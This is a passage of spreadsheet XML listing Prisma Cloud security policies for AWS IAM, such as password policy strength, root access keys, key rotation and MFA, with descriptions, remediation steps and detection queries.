      <c r="AE50" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF50" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG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kfirdaus-alert-rule-test - Notifications:email, AccountGroups:PCS AWS Accounts;,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0" t="inlineStr">
        <is>
          <t>fd4dae57-509e-4374-96d3-e136821fc3f3</t>
        </is>
      </c>
      <c r="AI50" t="inlineStr">
        <is>
          <t>fd4dae57-509e-4374-96d3-e136821fc3f3</t>
        </is>
      </c>
      <c r="AJ50" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK50" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="51">
      <c r="A51" t="inlineStr">
        <is>
          <t>Awesome Standard</t>
        </is>
      </c>
      <c r="B51" s="2" t="inlineStr">
        <is>
          <t>Awesome Inc</t>
        </is>
      </c>
      <c r="C51" s="2" t="inlineStr">
        <is>
          <t>Secure access management</t>
        </is>
      </c>
      <c r="D51" t="n">
        <v>0</v>
      </c>
      <c r="E51" t="n">
        <v>0</v>
      </c>
      <c r="F51" t="n">
        <v>39</v>
      </c>
      <c r="G51" t="b">
        <v>1</v>
      </c>
      <c r="H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1" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J51" t="inlineStr">
        <is>
          <t>aws-iam</t>
        </is>
      </c>
      <c r="K51" t="inlineStr">
        <is>
          <t>AWS IAM password policy does not have a minimum of 14 characters</t>
        </is>
      </c>
      <c r="L51" t="inlineStr">
        <is>
          <t>WEAK_PASSWORD</t>
        </is>
      </c>
      <c r="M51" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N51" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O51" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P51" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q51" t="inlineStr">
        <is>
          <t>Protect</t>
        </is>
      </c>
      <c r="R51" t="inlineStr">
        <is>
          <t>Secure access management</t>
        </is>
      </c>
      <c r="S51" t="inlineStr">
        <is>
          <t>CIS,Awesome_Standard,AW_AWS_Secure access management</t>
        </is>
      </c>
      <c r="T51" t="b">
        <v>1</v>
      </c>
      <c r="U51" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V51" t="inlineStr">
        <is>
          <t>aws-iam-get-account-password-policy</t>
        </is>
      </c>
      <c r="W51" t="inlineStr">
        <is>
          <t>Checks to ensure that IAM password policy requires minimum of 14 characters. AWS IAM (Identity &amp; Access Management) allows customers to secure AWS console access. As a security best practice, customers must have strong password policies in place.</t>
        </is>
      </c>
      <c r="X51" t="inlineStr">
        <is>
          <t>1. Login to the AWS console and navigate to the 'IAM' service.
2. On the left navigation panel, Click on 'Account Settings'
3. In the 'Minimum password length' field, put 14 or more (As per preference).
4. Click on 'Apply password policy' 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-iam-policies/iam-9-1
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-iam-policies/iam-9-1</t>
        </is>
      </c>
      <c r="Y51"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51" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name='aws-iam-get-account-password-policy' AND json.rule='isDefaultPolicy is true or minimumPasswordLength &lt; 14 or minimumPasswordLength does not exist'
{"category":"IAM","resourceTypes":["aws_iam_account_password_policy"]}</t>
        </is>
      </c>
      <c r="AA51" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB51" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC51" t="inlineStr">
        <is>
          <t>PC-AWS-IAM-12-CKV_AWS_10</t>
        </is>
      </c>
      <c r="AD51" t="b">
        <v>1</v>
      </c>
      <c r="AE51" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF51" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG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1" t="inlineStr">
        <is>
          <t>168bfaa0-8c1d-427e-bfa8-4d96d82e3d83</t>
        </is>
      </c>
      <c r="AI51" t="inlineStr">
        <is>
          <t>168bfaa0-8c1d-427e-bfa8-4d96d82e3d83</t>
        </is>
      </c>
      <c r="AJ51" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK51" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="52">
      <c r="A52" t="inlineStr">
        <is>
          <t>Awesome Standard</t>
        </is>
      </c>
      <c r="B52" s="2" t="inlineStr">
        <is>
          <t>Awesome Inc</t>
        </is>
      </c>
      <c r="C52" s="2" t="inlineStr">
        <is>
          <t>Secure access management</t>
        </is>
      </c>
      <c r="D52" t="n">
        <v>0</v>
      </c>
      <c r="E52" t="n">
        <v>0</v>
      </c>
      <c r="F52" t="n">
        <v>37</v>
      </c>
      <c r="G52" t="b">
        <v>1</v>
      </c>
      <c r="H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2" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J52" t="inlineStr">
        <is>
          <t>aws-iam</t>
        </is>
      </c>
      <c r="K52" t="inlineStr">
        <is>
          <t>AWS IAM password policy allows password reuse</t>
        </is>
      </c>
      <c r="L52" t="inlineStr">
        <is>
          <t>WEAK_PASSWORD</t>
        </is>
      </c>
      <c r="M52" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N52" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O52" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P52" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q52" t="inlineStr">
        <is>
          <t>Protect</t>
        </is>
      </c>
      <c r="R52" t="inlineStr">
        <is>
          <t>Secure access management</t>
        </is>
      </c>
      <c r="S52" t="inlineStr">
        <is>
          <t>CIS,Awesome_Standard,AW_AWS_Secure access management</t>
        </is>
      </c>
      <c r="T52" t="b">
        <v>1</v>
      </c>
      <c r="U52" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V52" t="inlineStr">
        <is>
          <t>aws-iam-get-account-password-policy</t>
        </is>
      </c>
      <c r="W52" t="inlineStr">
        <is>
          <t>This policy identifies IAM policies which allow password reuse . AWS IAM (Identity &amp; Access Management) allows customers to secure AWS console access. As a security best practice, customers must have strong password policies in place.</t>
        </is>
      </c>
      <c r="X52" t="inlineStr">
        <is>
          <t>1. Sign in to the AWS console and navigate to the 'IAM' service.
2. Click on 'Account Settings', check  'Prevent password reuse'.</t>
        </is>
      </c>
      <c r="Y52"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52" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' and api.name='aws-iam-get-account-password-policy' AND json.rule='isDefaultPolicy is true or passwordReusePrevention equals null or passwordReusePrevention !isType Integer or passwordReusePrevention &lt; 1'</t>
        </is>
      </c>
      <c r="AA52" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB52" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC52" t="inlineStr">
        <is>
          <t>PC-AWS-IAM-14</t>
        </is>
      </c>
      <c r="AD52" t="b">
        <v>1</v>
      </c>
      <c r="AE52" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF52" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG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2" t="inlineStr">
        <is>
          <t>a2107824-6ed5-4c67-9450-8b154bb1fd2b</t>
        </is>
      </c>
      <c r="AI52" t="inlineStr">
        <is>
          <t>a2107824-6ed5-4c67-9450-8b154bb1fd2b</t>
        </is>
      </c>
      <c r="AJ52" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK52" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="53">
      <c r="A53" t="inlineStr">
        <is>
          <t>Awesome Standard</t>
        </is>
      </c>
      <c r="B53" s="2" t="inlineStr">
        <is>
          <t>Awesome Inc</t>
        </is>
      </c>
      <c r="C53" s="2" t="inlineStr">
        <is>
          <t>Secure access management</t>
        </is>
      </c>
      <c r="D53" t="inlineStr"/>
      <c r="E53" t="inlineStr"/>
      <c r="F53" t="inlineStr"/>
      <c r="G53" t="b">
        <v>1</v>
      </c>
      <c r="H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3" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J53" t="inlineStr">
        <is>
          <t>aws-iam</t>
        </is>
      </c>
      <c r="K53" t="inlineStr">
        <is>
          <t>AWS IAM Password policy is unsecure</t>
        </is>
      </c>
      <c r="L53" t="inlineStr">
        <is>
          <t>WEAK_PASSWORD</t>
        </is>
      </c>
      <c r="M53" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N53" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O53" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P53" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q53" t="inlineStr">
        <is>
          <t>Protect</t>
        </is>
      </c>
      <c r="R53" t="inlineStr">
        <is>
          <t>Secure access management</t>
        </is>
      </c>
      <c r="S53" t="inlineStr">
        <is>
          <t>Identity Misconfiguration,Prisma_Cloud,Awesome_Standard,AW_AWS_Secure access management</t>
        </is>
      </c>
      <c r="T53" t="b">
        <v>1</v>
      </c>
      <c r="U53" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V53" t="inlineStr">
        <is>
          <t>aws-iam-get-account-password-policy</t>
        </is>
      </c>
      <c r="W53" t="inlineStr">
        <is>
          <t>Checks to ensure that IAM password policy is in place for the cloud accounts. As a security best practice, customers must have strong password policies in place. This policy ensures password policies are set with all following options:
- Minimum Password Length
- At least one Uppercase letter
- At least one Lowercase letter
- At least one Number
- At least one Symbol/non-alphanumeric character
- Users have permission to change their own password
- Password expiration period
- Password reuse
- Password expiration requires administrator reset</t>
        </is>
      </c>
      <c r="X53" t="inlineStr">
        <is>
          <t>1. Login to AWS Console and navigate to the 'IAM' Service
2. Click on 'Account Settings'
3. Under 'Password Policy', select and set all the options
4. Click on 'Apply password policy'</t>
        </is>
      </c>
      <c r="Y53"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53" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-iam-get-account-password-policy' AND json.rule =  'requireNumbers contains false and requireSymbols contains false and expirePasswords contains false and allowUsersToChangePassword contains false and requireLowercaseCharacters contains false and requireUppercaseCharacters contains false and maxPasswordAge does not exist and passwordReusePrevention does not exist and minimumPasswordLength==6'</t>
        </is>
      </c>
      <c r="AA53" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB53" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC53" t="inlineStr">
        <is>
          <t>PC-AWS-IAM-9</t>
        </is>
      </c>
      <c r="AD53" t="b">
        <v>1</v>
      </c>
      <c r="AE53" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF53" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG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3" t="inlineStr">
        <is>
          <t>b1acdeff-4959-4c14-8a5e-2adc1016a3d5</t>
        </is>
      </c>
      <c r="AI53" t="inlineStr">
        <is>
          <t>1e0076af-0ccd-4f1c-bba5-ac92964a5e6b</t>
        </is>
      </c>
      <c r="AJ53" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK53" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="54">
      <c r="A54" t="inlineStr">
        <is>
          <t>Awesome Standard</t>
        </is>
      </c>
      <c r="B54" s="2" t="inlineStr">
        <is>
          <t>Awesome Inc</t>
        </is>
      </c>
      <c r="C54" s="2" t="inlineStr">
        <is>
          <t>Secure access management</t>
        </is>
      </c>
      <c r="D54" t="inlineStr"/>
      <c r="E54" t="inlineStr"/>
      <c r="F54" t="inlineStr"/>
      <c r="G54" t="b">
        <v>1</v>
      </c>
      <c r="H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4" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J54" t="inlineStr">
        <is>
          <t>aws-iam</t>
        </is>
      </c>
      <c r="K54" t="inlineStr">
        <is>
          <t>AWS IAM password policy does not have password expiration period</t>
        </is>
      </c>
      <c r="L54" t="inlineStr">
        <is>
          <t>WEAK_PASSWORD</t>
        </is>
      </c>
      <c r="M54" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N54" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O54" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P54" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q54" t="inlineStr">
        <is>
          <t>Protect</t>
        </is>
      </c>
      <c r="R54" t="inlineStr">
        <is>
          <t>Secure access management</t>
        </is>
      </c>
      <c r="S54" t="inlineStr">
        <is>
          <t>CIS,Awesome_Standard,AW_AWS_Secure access management</t>
        </is>
      </c>
      <c r="T54" t="b">
        <v>1</v>
      </c>
      <c r="U54" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V54" t="inlineStr">
        <is>
          <t>aws-iam-get-account-password-policy</t>
        </is>
      </c>
      <c r="W54" t="inlineStr">
        <is>
          <t>Checks to ensure that IAM password policy has an expiration period. AWS IAM (Identity &amp; Access Management) allows customers to secure AWS console access. As a security best practice, customers must have strong password policies in place.</t>
        </is>
      </c>
      <c r="X54" t="inlineStr">
        <is>
          <t>1. Login to the AWS console and navigate to the 'IAM' service.
2. On the left navigation panel, Click on 'Account Settings'
3. check 'Enable password expiration' and enter a password expiration period.
4. Click on 'Apply password policy'</t>
        </is>
      </c>
      <c r="Y54"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'impact': 'modify password policy',
'cliScriptTemplate': 'aws iam update-account-password-policy --minimum-password-length 14 --require-uppercase-characters --require-lowercase-characters --require-numbers --require-symbols --allow-users-to-change-password --password-reuse-prevention 24 --max-password-age 90'</t>
        </is>
      </c>
      <c r="Z54" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name='aws-iam-get-account-password-policy' AND json.rule='isDefaultPolicy is true or maxPasswordAge !isType Integer or maxPasswordAge &lt; 1 or maxPasswordAge does not exist'</t>
        </is>
      </c>
      <c r="AA54" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB54" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC54" t="inlineStr">
        <is>
          <t>PC-AWS-IAM-11</t>
        </is>
      </c>
      <c r="AD54" t="b">
        <v>1</v>
      </c>
      <c r="AE54" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF54" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG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4" t="inlineStr">
        <is>
          <t>a8dcc272-0b02-4534-8627-cf70ddd264c5</t>
        </is>
      </c>
      <c r="AI54" t="inlineStr">
        <is>
          <t>a8dcc272-0b02-4534-8627-cf70ddd264c5</t>
        </is>
      </c>
      <c r="AJ54" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK54" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="55">
      <c r="A55" t="inlineStr">
        <is>
          <t>Awesome Standard</t>
        </is>
      </c>
      <c r="B55" s="2" t="inlineStr">
        <is>
          <t>Awesome Inc</t>
        </is>
      </c>
      <c r="C55" s="2" t="inlineStr">
        <is>
          <t>Secure access management</t>
        </is>
      </c>
      <c r="D55" t="n">
        <v>0</v>
      </c>
      <c r="E55" t="n">
        <v>0</v>
      </c>
      <c r="F55" t="n">
        <v>4</v>
      </c>
      <c r="G55" t="b">
        <v>1</v>
      </c>
      <c r="H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5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J55" t="inlineStr">
        <is>
          <t>aws-iam</t>
        </is>
      </c>
      <c r="K55" t="inlineStr">
        <is>
          <t>AWS Access key enabled on root account</t>
        </is>
      </c>
      <c r="L55" t="inlineStr">
        <is>
          <t>KEYS_AND_SECRETS</t>
        </is>
      </c>
      <c r="M55" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N55" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O55" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P55" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q55" t="inlineStr">
        <is>
          <t>Protect</t>
        </is>
      </c>
      <c r="R55" t="inlineStr">
        <is>
          <t>Secure access management</t>
        </is>
      </c>
      <c r="S55" t="inlineStr">
        <is>
          <t>Identity Misconfiguration,Policy Status Review,Prisma_Cloud,Awesome_Standard,AW_AWS_Secure access management</t>
        </is>
      </c>
      <c r="T55" t="b">
        <v>0</v>
      </c>
      <c r="U55" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V55" t="inlineStr">
        <is>
          <t>aws-iam-get-account-summary</t>
        </is>
      </c>
      <c r="W55" t="inlineStr">
        <is>
          <t>This policy identifies root accounts for which access keys are enabled. Access keys are used to sign API requests to AWS. Root accounts have complete access to all your AWS services. If the access key for a root account is compromised, an unauthorized users will have complete access to your AWS account.</t>
        </is>
      </c>
      <c r="X55" t="inlineStr">
        <is>
          <t>1. Sign in to AWS Console as the root user.
2. Click root account name and on the top right select  'Security Credentials' from the dropdown.
3. For each key in 'Access Keys', click on "X" to delete the keys. 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-iam-policies/bc-aws-348
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-iam-policies/bc-aws-348</t>
        </is>
      </c>
      <c r="Y55" t="inlineStr"/>
      <c r="Z55" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' and api.name='aws-iam-get-account-summary' AND json.rule='not AccountAccessKeysPresent equals 0'
{"category":"IAM","resourceTypes":["aws_iam_access_key"]}</t>
        </is>
      </c>
      <c r="AA55" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB55" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC55" t="inlineStr">
        <is>
          <t>PC-AWS-IAM-6-CKV_AWS_348</t>
        </is>
      </c>
      <c r="AD55" t="b">
        <v>1</v>
      </c>
      <c r="AE55" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF55" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG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5" t="inlineStr">
        <is>
          <t>88db4b66-4dec-48c0-9013-c7871d61b1c8</t>
        </is>
      </c>
      <c r="AI55" t="inlineStr">
        <is>
          <t>88db4b66-4dec-48c0-9013-c7871d61b1c8</t>
        </is>
      </c>
      <c r="AJ55" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK55" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="56">
      <c r="A56" t="inlineStr">
        <is>
          <t>Awesome Standard</t>
        </is>
      </c>
      <c r="B56" s="2" t="inlineStr">
        <is>
          <t>Awesome Inc</t>
        </is>
      </c>
      <c r="C56" s="2" t="inlineStr">
        <is>
          <t>Secure access management</t>
        </is>
      </c>
      <c r="D56" t="inlineStr"/>
      <c r="E56" t="inlineStr"/>
      <c r="F56" t="inlineStr"/>
      <c r="G56" t="b">
        <v>0</v>
      </c>
      <c r="H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6" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J56" t="inlineStr">
        <is>
          <t>aws-iam</t>
        </is>
      </c>
      <c r="K56" t="inlineStr">
        <is>
          <t>AWS access keys are not rotated for 180  days</t>
        </is>
      </c>
      <c r="L56" t="inlineStr"/>
      <c r="M56" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N56" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O56" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P56" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q56" t="inlineStr">
        <is>
          <t>Protect</t>
        </is>
      </c>
      <c r="R56" t="inlineStr">
        <is>
          <t>Secure access management</t>
        </is>
      </c>
      <c r="S56" t="inlineStr">
        <is>
          <t>CIS,Awesome_Standard,AW_AWS_Secure access management,Custom</t>
        </is>
      </c>
      <c r="T56" t="b">
        <v>0</v>
      </c>
      <c r="U56" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V56" t="inlineStr">
        <is>
          <t>aws-iam-get-credential-report</t>
        </is>
      </c>
      <c r="W56" t="inlineStr">
        <is>
          <t>This policy identifies IAM users for which access keys are not rotated for 90 days. Access keys are used to sign API requests to AWS. As a security best practice, it is recommended that all access keys are regularly rotated to make sure that in the event of key compromise, unauthorized users are not able to gain access to your AWS services.</t>
        </is>
      </c>
      <c r="X56" t="inlineStr">
        <is>
          <t>1. Sign in to the AWS console and navigate to the 'IAM' service.
2. Click on the user that was reported in the alert.
3. Click on 'Security Credentials' and for each 'Access Key'.
4. Follow the instructions below to rotate the Access Keys that are older than 90 days.
https://aws.amazon.com/blogs/security/how-to-rotate-access-keys-for-iam-users/</t>
        </is>
      </c>
      <c r="Y56" t="inlineStr"/>
      <c r="Z56" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' and api.name = 'aws-iam-get-credential-report' AND json.rule = '(access_key_1_active is true and access_key_1_last_rotated != N/A and _DateTime.ageInDays(access_key_1_last_rotated) &gt; 150) or (access_key_2_active is true and access_key_2_last_rotated != N/A and _DateTime.ageInDays(access_key_2_last_rotated) &gt; 150)'</t>
        </is>
      </c>
      <c r="AA56" t="inlineStr">
        <is>
          <t>Marius Banica</t>
        </is>
      </c>
      <c r="AB56" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC56" t="inlineStr"/>
      <c r="AD56" t="b">
        <v>0</v>
      </c>
      <c r="AE56" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF56" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG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6" t="inlineStr">
        <is>
          <t>6cc88d6b-4da2-4db5-b597-80129193c8d3</t>
        </is>
      </c>
      <c r="AI56" t="inlineStr">
        <is>
          <t>db6fa0d5-35dc-4c8e-8ec4-f7c853feccb7</t>
        </is>
      </c>
      <c r="AJ56" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK56" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="57">
      <c r="A57" t="inlineStr">
        <is>
          <t>Awesome Standard</t>
        </is>
      </c>
      <c r="B57" s="2" t="inlineStr">
        <is>
          <t>Awesome Inc</t>
        </is>
      </c>
      <c r="C57" s="2" t="inlineStr">
        <is>
          <t>Secure access management</t>
        </is>
      </c>
      <c r="D57" t="n">
        <v>0</v>
      </c>
      <c r="E57" t="n">
        <v>0</v>
      </c>
      <c r="F57" t="n">
        <v>42</v>
      </c>
      <c r="G57" t="b">
        <v>1</v>
      </c>
      <c r="H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7" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J57" t="inlineStr">
        <is>
          <t>aws-iam</t>
        </is>
      </c>
      <c r="K57" t="inlineStr">
        <is>
          <t>AWS access keys are not rotated for 90 days</t>
        </is>
      </c>
      <c r="L57" t="inlineStr">
        <is>
          <t>KEYS_AND_SECRETS</t>
        </is>
      </c>
      <c r="M57" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N57" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O57" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P57" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q57" t="inlineStr">
        <is>
          <t>Protect</t>
        </is>
      </c>
      <c r="R57" t="inlineStr">
        <is>
          <t>Secure access management</t>
        </is>
      </c>
      <c r="S57" t="inlineStr">
        <is>
          <t>CIS,Awesome_Standard,AW_AWS_Secure access management</t>
        </is>
      </c>
      <c r="T57" t="b">
        <v>0</v>
      </c>
      <c r="U57" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V57" t="inlineStr">
        <is>
          <t>aws-iam-get-credential-report</t>
        </is>
      </c>
      <c r="W57" t="inlineStr">
        <is>
          <t>This policy identifies IAM users for which access keys are not rotated for 90 days. Access keys are used to sign API requests to AWS. As a security best practice, it is recommended that all access keys are regularly rotated to make sure that in the event of key compromise, unauthorized users are not able to gain access to your AWS services.</t>
        </is>
      </c>
      <c r="X57" t="inlineStr">
        <is>
          <t>1. Sign in to the AWS console and navigate to the 'IAM' service.
2. Click on the user that was reported in the alert.
3. Click on 'Security Credentials' and for each 'Access Key'.
4. Follow the instructions below to rotate the Access Keys that are older than 90 days.
https://aws.amazon.com/blogs/security/how-to-rotate-access-keys-for-iam-users/</t>
        </is>
      </c>
      <c r="Y57" t="inlineStr"/>
      <c r="Z57" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' and api.name = 'aws-iam-get-credential-report' AND json.rule = '(access_key_1_active is true and access_key_1_last_rotated != N/A and _DateTime.ageInDays(access_key_1_last_rotated) &gt; 90) or (access_key_2_active is true and access_key_2_last_rotated != N/A and _DateTime.ageInDays(access_key_2_last_rotated) &gt; 90)'</t>
        </is>
      </c>
      <c r="AA57" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB57" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC57" t="inlineStr">
        <is>
          <t>PC-AWS-IAM-7</t>
        </is>
      </c>
      <c r="AD57" t="b">
        <v>1</v>
      </c>
      <c r="AE57" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF57" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG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7" t="inlineStr">
        <is>
          <t>6ea06abf-bfd3-49f2-9332-9aee02c31d58</t>
        </is>
      </c>
      <c r="AI57" t="inlineStr">
        <is>
          <t>6ea06abf-bfd3-49f2-9332-9aee02c31d58</t>
        </is>
      </c>
      <c r="AJ57" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK57" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="58">
      <c r="A58" t="inlineStr">
        <is>
          <t>Awesome Standard</t>
        </is>
      </c>
      <c r="B58" s="2" t="inlineStr">
        <is>
          <t>Awesome Inc</t>
        </is>
      </c>
      <c r="C58" s="2" t="inlineStr">
        <is>
          <t>Secure access management</t>
        </is>
      </c>
      <c r="D58" t="n">
        <v>0</v>
      </c>
      <c r="E58" t="n">
        <v>0</v>
      </c>
      <c r="F58" t="n">
        <v>48</v>
      </c>
      <c r="G58" t="b">
        <v>1</v>
      </c>
      <c r="H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8" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J58" t="inlineStr">
        <is>
          <t>aws-iam</t>
        </is>
      </c>
      <c r="K58" t="inlineStr">
        <is>
          <t>AWS MFA not enabled for IAM users</t>
        </is>
      </c>
      <c r="L58" t="inlineStr">
        <is>
          <t>MFA</t>
        </is>
      </c>
      <c r="M58" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N58" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O58" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P58" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q58" t="inlineStr">
        <is>
          <t>Protect</t>
        </is>
      </c>
      <c r="R58" t="inlineStr">
        <is>
          <t>Secure access management</t>
        </is>
      </c>
      <c r="S58" t="inlineStr">
        <is>
          <t>Identity Misconfiguration,Policy Status Review,Prisma_Cloud,Awesome_Standard,AW_AWS_Secure access management</t>
        </is>
      </c>
      <c r="T58" t="b">
        <v>0</v>
      </c>
      <c r="U58" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V58" t="inlineStr">
        <is>
          <t>aws-iam-get-credential-report</t>
        </is>
      </c>
      <c r="W58" t="inlineStr">
        <is>
          <t>This policy identifies AWS IAM users for whom MFA is not enabled. AWS Multi-Factor Authentication (MFA) is a simple best practice that adds an extra layer of protection on top of your user name and password. Multiple factors provide increased security for your AWS account settings and resources.</t>
        </is>
      </c>
      <c r="X58" t="inlineStr">
        <is>
          <t>1. Sign in to the AWS and navigate to the 'IAM' service.
2. Navigate to the user that was reported in the alert.
